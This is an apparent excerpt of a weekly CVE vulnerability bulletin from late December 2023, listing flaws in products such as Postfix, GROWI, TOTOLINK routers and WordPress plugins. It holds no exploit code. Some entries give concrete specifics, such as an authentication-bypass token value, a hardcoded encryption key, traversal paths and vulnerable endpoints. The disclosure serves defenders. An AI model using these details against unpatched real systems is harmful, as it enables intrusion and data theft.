peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in the administration web service allows read-only unprivileged users to obtain sensitive information about the device configuration. 2023-12-28 not yet calculated CVE-2023-49229
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals’ configurations without prior authentication. 2023-12-28 not yet calculated CVE-2023-49230
cve@mitre.org
perl_spreadsheet::parseexcel — perl_spreadsheet::parseexcel Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic. 2023-12-24 not yet calculated CVE-2023-7101
mandiant-cve@google.com
phpgurukul — small_crm PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection on the Users login panel because the “password” parameter is used directly in the SQL query without any sanitization, so the SQL Injection payload is executed. 2023-12-29 not yet calculated CVE-2023-50035
cve@mitre.org
postfix — postfix Postfix through 3.8.4 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required: the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9. 2023-12-24 not yet calculated CVE-2023-51764
cve@mitre.org
prestashop — prestashop SQL Injection vulnerability in the Innovadeluxe Quick Order module for PrestaShop before v.1.4.0 allows local attackers to execute arbitrary code via the getProducts() function in the productlist.php file. 2023-12-28 not yet calculated CVE-2023-46989
cve@mitre.org
proftpd — proftpd make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics. 2023-12-22 not yet calculated CVE-2023-51713
cve@mitre.org
qt — qt An issue was discovered in the HTTP2 implementation in Qt before 5.15.17, 6.x before 6.2.11, 6.3.x through 6.5.x before 6.5.4, and 6.6.x before 6.6.2. network/access/http2/hpacktable.cpp has an incorrect HPack integer overflow check. 2023-12-24 not yet calculated CVE-2023-51714
cve@mitre.org
resumable_js — resumable_js resumable.php (aka PHP backend for resumable.js) 0.1.4 before 3c6dbf5 allows arbitrary file upload anywhere in the filesystem via ../ in multipart/form-data content to upload.php. (File overwrite hasn’t been possible with the code available in GitHub in recent years, however.) 2023-12-26 not yet calculated CVE-2023-52086
cve@mitre.org
ruby_on_rails — ruby_on_rails In ActiveAdmin (aka Active Admin) before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data (that belongs to another user) by making CSV export requests at certain specific times. 2023-12-28 not yet calculated CVE-2023-50448
cve@mitre.org
ruby_on_rails — ruby_on_rails csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection. 2023-12-24 not yet calculated CVE-2023-51763
cve@mitre.org
rws — worldserver An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint. 2023-12-25 not yet calculated CVE-2022-34267
cve@mitre.org
rws — worldserver An issue was discovered in RWS WorldServer before 11.7.3. /clientLogin deserializes Java objects without authentication, leading to command execution on the host. 2023-12-25 not yet calculated CVE-2022-34268
cve@mitre.org
scone — scone A lack of pointer-validation logic in the __scone_dispatch component of SCONE before v5.8.0 for Intel SGX allows attackers to access sensitive information. 2023-12-30 not yet calculated CVE-2022-46486
cve@mitre.org
scone — scone Improper initialization of x87 and SSE floating-point configuration registers in the __scone_entry component of SCONE before 5.8.0 for Intel SGX allows a local attacker to compromise the execution integrity of floating-point operations in an enclave or access sensitive information via side-channel analysis. 2023-12-30 not yet calculated CVE-2022-46487
cve@mitre.org
scone — scone An issue was discovered in SCONE Confidential Computing Platform before 5.8.0 for Intel SGX. Lack of pointer-alignment logic in __scone_dispatch and other entry functions allows a local attacker to access unauthorized information, aka an “AEPIC Leak.” 2023-12-30 not yet calculated CVE-2023-38023
cve@mitre.org
seacms — seacms SeaCMS v12.9 was discovered to contain a remote code execution (RCE) vulnerability via the component /augap/adminip.php. 2023-12-28 not yet calculated CVE-2023-46987
cve@mitre.org
seacms — seacms A cross-site scripting (XSS) vulnerability in the component admin_ Video.php of SeaCMS v12.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. 2023-12-28 not yet calculated CVE-2023-50470
cve@mitre.org
sendmail — sendmail sendmail through at least 8.14.7 allows SMTP smuggling in certain configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because sendmail supports <LF>.<CR><LF> but some other popular e-mail servers do not. 2023-12-24 not yet calculated CVE-2023-51765
cve@mitre.org
sesami_io — sesami_io An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows local attackers to obtain sensitive information and bypass authentication via “Back Button Refresh” attack. 2023-12-29 not yet calculated CVE-2023-31292
cve@mitre.org
sesami_io — sesami_io An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to obtain sensitive information and bypass profile restriction via improper access control in the Reader system user’s web browser, allowing the journal to be displayed, despite the option being disabled. 2023-12-29 not yet calculated CVE-2023-31293
cve@mitre.org
sesami_io — sesami_io CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the Delivery Name field. 2023-12-29 not yet calculated CVE-2023-31294
cve@mitre.org
sesami_io — sesami_io CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the User Profile field. 2023-12-29 not yet calculated CVE-2023-31295
cve@mitre.org
sesami_io — sesami_io CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows attackers to obtain sensitive information via the User Name field. 2023-12-29 not yet calculated CVE-2023-31296
cve@mitre.org
sesami_io — sesami_io An issue was discovered in SESAMI planfocus CPTO (Cash Point & Transport Optimizer) 6.3.8.6 718. There is XSS via the Name field when modifying a client. 2023-12-25 not yet calculated CVE-2023-31297
cve@mitre.org
sesami_io — sesami_io Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the User ID field when creating a new system user. 2023-12-29 not yet calculated CVE-2023-31298
cve@mitre.org
sesami_io — sesami_io Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Barcode field of a container. 2023-12-29 not yet calculated CVE-2023-31299
cve@mitre.org
sesami_io — sesami_io An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via transmission of unencrypted, cleartext credentials during Password Reset feature. 2023-12-29 not yet calculated CVE-2023-31300
cve@mitre.org
sesami_io — sesami_io Stored Cross Site Scripting (XSS) Vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the Username field of the login form and application log. 2023-12-29 not yet calculated CVE-2023-31301
cve@mitre.org
sesami_io — sesami_io Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Teller field. 2023-12-29 not yet calculated CVE-2023-31302
cve@mitre.org
shaarli — shaarli Reflected Cross Site Scripting (XSS) vulnerability in Shaarli v0.12.2, allows remote attackers to execute arbitrary code via search tag function. 2023-12-28 not yet calculated CVE-2023-49469
cve@mitre.org
shenzhen_tcl_new_technology_co.,_limited — tv_web_browser An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component. 2023-12-27 not yet calculated CVE-2023-43481
cve@mitre.org
simple_http_server/simple_http_server_plus — simple_http_server/simple_http_server_plus Phlox com.phlox.simpleserver (aka Simple HTTP Server) 1.8 and com.phlox.simpleserver.plus (aka Simple HTTP Server PLUS) 1.8.1-plus have a hardcoded aKySWb2jjrr4dzkYXczKRt7K encryption key. The threat is from a man-in-the-middle attacker who can intercept and potentially modify data during transmission. 2023-12-27 not yet calculated CVE-2023-46919
cve@mitre.org
simple_http_server_plus — simple_http_server_plus Phlox com.phlox.simpleserver.plus (aka Simple HTTP Server PLUS) 1.8.1-plus has an Android manifest file that contains an entry with the android:allowBackup attribute set to true. This could be leveraged by an attacker with physical access to the device. 2023-12-27 not yet calculated CVE-2023-46918
cve@mitre.org
simplemobiletools — simple_dialer An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity. 2023-12-27 not yet calculated CVE-2023-49003
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject. 2023-12-29 not yet calculated CVE-2023-50070
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name. 2023-12-29 not yet calculated CVE-2023-50071
cve@mitre.org
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) before 4.3.17, 4.4.x through 4.6.x before 4.6.4, and 4.7.x before 4.7.1. It affects user accounts for which the password has an equals sign or space character. The serverd process logs such passwords in cleartext, and potentially sends these logs to the Syslog component. 2023-12-26 not yet calculated CVE-2023-28616
cve@mitre.org
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) SNS 4.3.13 through 4.3.22 before 4.3.23, SNS 4.6.0 through 4.6.9 before 4.6.10, and SNS 4.7.0 through 4.7.1 before 4.7.2. An attacker can overflow the cookie threshold, making an IPsec connection impossible. 2023-12-25 not yet calculated CVE-2023-47091
cve@mitre.org
sudo — sudo Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit. 2023-12-22 not yet calculated CVE-2023-42465
cve@mitre.org
sysaid_on-premise — sysaid_on-premise In SysAid On-Premise before 23.3.34, there is an edge case in which an end user is able to delete a Knowledge Base article, aka bug 15102. 2023-12-25 not yet calculated CVE-2023-47247
cve@mitre.org
testlink — testlink TestLink through 1.9.20 allows type juggling for authentication bypass because === is not used. 2023-12-30 not yet calculated CVE-2023-50110
cve@mitre.org
textpattern_cms — textpattern_cms There is an arbitrary file upload vulnerability in the background of textpattern cms v4.8.8, which leads to the loss of server permissions. 2023-12-28 not yet calculated CVE-2023-50038
cve@mitre.org
thirty_bees — thirty_bees A stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling. 2023-12-22 not yet calculated CVE-2023-45957
cve@mitre.org
totolink — ex1200l TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface. 2023-12-22 not yet calculated CVE-2023-51034
cve@mitre.org
totolink — ex1200l TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface. 2023-12-22 not yet calculated CVE-2023-51035
cve@mitre.org
totolink — x2000r_gh TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRoute. 2023-12-30 not yet calculated CVE-2023-51133
cve@mitre.org
totolink — x2000r_gh TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formPasswordSetup. 2023-12-30 not yet calculated CVE-2023-51135
cve@mitre.org
totolink — x2000r_gh TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRebootSchedule. 2023-12-30 not yet calculated CVE-2023-51136
cve@mitre.org
totolink — x6000r TOTOLINK X6000R v9.4.0cu.852_B20230719 was discovered to contain a remote command execution (RCE) vulnerability via the component /cgi-bin/cstecgi.cgi. 2023-12-30 not yet calculated CVE-2023-50651
cve@mitre.org
tp-link — tapo Incorrect access control in TP-Link Tapo before v3.1.315 allows attackers to access user credentials in plaintext. 2023-12-28 not yet calculated CVE-2023-34829
cve@mitre.org
tv_bro_application — tv_bro_application The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files, and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData. 2023-12-27 not yet calculated CVE-2023-43955
cve@mitre.org
tv_browser_application_for_android — tv_browser_application_for_android The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity. 2023-12-27 not yet calculated CVE-2023-47883
cve@mitre.org
typo3 — typo3 In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST /typo3/record/edit with ../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. 2023-12-25 not yet calculated CVE-2023-30451
cve@mitre.org
unified_remote — unified_remote Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. 2023-12-30 not yet calculated CVE-2023-52252
cve@mitre.org
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the presentation feature of GROWI versions prior to v3.4.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-42436
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the App Settings (/admin/app) page and the Markdown Settings (/admin/markdown) page of GROWI versions prior to v3.5.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-45737
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability when processing profile images exists in GROWI versions prior to v4.1.3. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-45740
vultures@jpcert.or.jp
weseek,_inc. — growi Cross-site request forgery (CSRF) vulnerability exists in the User settings (/me) page of GROWI versions prior to v6.0.0. If a user views a malicious page while logging in, settings may be changed without the user’s intention. 2023-12-26 not yet calculated CVE-2023-46699
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability which is exploiting a behavior of the XSS Filter exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-47215
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability via the img tags exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49119
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the event handlers of the pre tags in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49598
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the anchor tag of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49779
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability when processing the MathJax exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49807
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the App Settings (/admin/app) page, the Markdown Settings (/admin/markdown) page, and the Customize (/admin/customize) page of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-50175
vultures@jpcert.or.jp
weseek,_inc. — growi The App Settings (/admin/app) page in GROWI versions prior to v6.0.6 stores sensitive information in cleartext form. As a result, the Secret access key for external service may be obtained by an attacker who can access the App Settings page. 2023-12-26 not yet calculated CVE-2023-50294
vultures@jpcert.or.jp
weseek,_inc. — growi Improper authorization vulnerability exists in the User Management (/admin/users) page of GROWI versions prior to v6.0.6. If this vulnerability is exploited, a user may delete or suspend its own account without the user’s intention. 2023-12-26 not yet calculated CVE-2023-50332
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the User Management (/admin/users) page of GROWI versions prior to v6.1.11. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-50339
vultures@jpcert.or.jp
wiremock — wiremock WireMock with GUI versions 3.2.0.0 through 3.0.4.0 are vulnerable to stored cross-site scripting (SXSS) through the recording feature. An attacker can host a malicious payload and perform a test mapping pointing to the attacker’s file, and the result will render on the Matched page in the Body area, resulting in the execution of the payload. This occurs because the response body is not validated or sanitized. 2023-12-29 not yet calculated CVE-2023-50069
cve@mitre.org
wolters_kluwer — b.point On a Wolters Kluwer B.POINT 23.70.00 server running Linux on premises, during the authentication phase, a validated system user can achieve remote code execution via Argument Injection in the server-to-server module. 2023-12-25 not yet calculated CVE-2023-49328
cve@mitre.org
wordpress — wordpress The WP Sessions Time Monitoring Full Automatic WordPress plugin before 1.0.9 does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique. 2023-12-26 not yet calculated CVE-2023-5203
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users. 2023-12-26 not yet calculated CVE-2023-5644
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. 2023-12-26 not yet calculated CVE-2023-5645
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files. 2023-12-26 not yet calculated CVE-2023-5672
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly validate file extensions uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution. 2023-12-26 not yet calculated CVE-2023-5673
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. 2023-12-26 not yet calculated CVE-2023-5674
contact@wpscan.com
wordpress — wordpress The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server. 2023-12-26 not yet calculated CVE-2023-5931
contact@wpscan.com
wordpress — wordpress The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 2023-12-26 not yet calculated CVE-2023-5939
contact@wpscan.com
wordpress — wordpress The BSK Forms Blacklist WordPress plugin before 3.7 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). 2023-12-26 not yet calculated CVE-2023-5980
contact@wpscan.com
wordpress — wordpress The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorization checks, allowing unauthenticated users to download and delete arbitrary files on the server. 2023-12-26 not yet calculated CVE-2023-5991
contact@wpscan.com
wordpress — wordpress The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site. 2023-12-26 not yet calculated CVE-2023-6114
contact@wpscan.com
wordpress — wordpress The Quiz Maker WordPress plugin before 6.4.9.5 does not adequately authorize the `ays_quiz_author_user_search` AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses. 2023-12-26 not yet calculated CVE-2023-6155
contact@wpscan.com
wordpress — wordpress The Quiz Maker WordPress plugin before 6.4.9.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting 2023-12-26 not yet calculated CVE-2023-6166
contact@wpscan.com
wordpress — wordpress The BestWebSoft’s Like & Share WordPress plugin before 2.74 discloses the content of password protected posts to unauthenticated users via a meta tag 2023-12-26 not yet calculated CVE-2023-6250
contact@wpscan.com
wordpress — wordpress The JSON Content Importer WordPress plugin before 1.5.4 does not sanitize and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2023-12-26 not yet calculated CVE-2023-6268
contact@wpscan.com
xenom_technologies — phone_dialer-voice_call_dialer An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity. 2023-12-27 not yet calculated CVE-2023-49002
cve@mitre.org
xiangshan — xiangshan An issue was discovered in XiangShan v2.1, allows local attackers to obtain sensitive information via the L1D cache. 2023-12-30 not yet calculated CVE-2023-50559
cve@mitre.org
xnview — classic_for_windows XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3ADBD0. 2023-12-29 not yet calculated CVE-2023-52173
cve@mitre.org
xnview — classic_for_windows XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3125D6. 2023-12-29 not yet calculated CVE-2023-52174
cve@mitre.org
youloft_holding_group_co. — perpetual_calendar An issue in the openFile method of Chinese Perpetual Calendar v9.0.0 allows attackers to read any file via unspecified vectors. 2023-12-28 not yet calculated CVE-2023-51006
cve@mitre.org
zzcms — zzcms ZZCMS 2023 has a file upload vulnerability in 3/E_bak5.1/upload/index.php, allowing attackers to exploit this loophole to gain server privileges and execute arbitrary code. 2023-12-29 not yet calculated CVE-2023-50104
cve@mitre.org


Vulnerability Summary for the Week of December 18, 2023

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
52north — 52north_wps An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. 2023-12-19 7.2 CVE-2023-6280
cve-coordination@incibe.es
aditaas — allied_digital_integrated_tool-as-a-service The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform. 2023-12-18 9.8 CVE-2023-6483
vdisclose@cert-in.org.in
apache — doris The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues. 2023-12-18 8.2 CVE-2023-41314
security@apache.org
apache — dubbo A deserialization vulnerability existed when decoding a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 9.8 CVE-2023-29234
security@apache.org
apache — dubbo Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 9.8 CVE-2023-46279
security@apache.org
apache — guacamole Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue. 2023-12-19 8.8 CVE-2023-43826
security@apache.org
apache — guacamole When installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content. 2023-12-19 8.1 CVE-2023-43870
cert@ncsc.nl
apache — pulsar Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions. 2023-12-20 7.5 CVE-2023-37544
security@apache.org
apache — superset An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue. 2023-12-19 7.7 CVE-2023-49734
security@apache.org
armorxgt — spamtrap ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48384
twcert@cert.org.tw
aveva — edge An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. 2023-12-16 9.8 CVE-2021-42796
cve@mitre.org
aveva — edge Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. 2023-12-16 7.5 CVE-2021-42797
cve@mitre.org
awslabs — sandbox-accounts-for-events “Sandbox Accounts for Events” provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. 2023-12-22 7.1 CVE-2023-50928
security-advisories@github.com
awslabs — sandbox-accounts-for-events Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. 2023-12-22 7.8 CVE-2023-51386
security-advisories@github.com
backupbliss — backup_migration The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. 2023-12-15 9.8 CVE-2023-6553
security@wordfence.com
bazarr — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read: the /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50264
security-advisories@github.com
bazarr — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50265
security-advisories@github.com
bosch — cpp13_firmware A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera. 2023-12-18 7.2 CVE-2023-39509
psirt@bosch.com
bosch — monitor_wall An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. 2023-12-18 7.5 CVE-2023-32230
psirt@bosch.com
cacti — cacti Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). By using the detected SQL injection together with insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is `link.php`. Impact of the vulnerability: execution of arbitrary code on the server. 2023-12-21 8 CVE-2023-49084
security-advisories@github.com
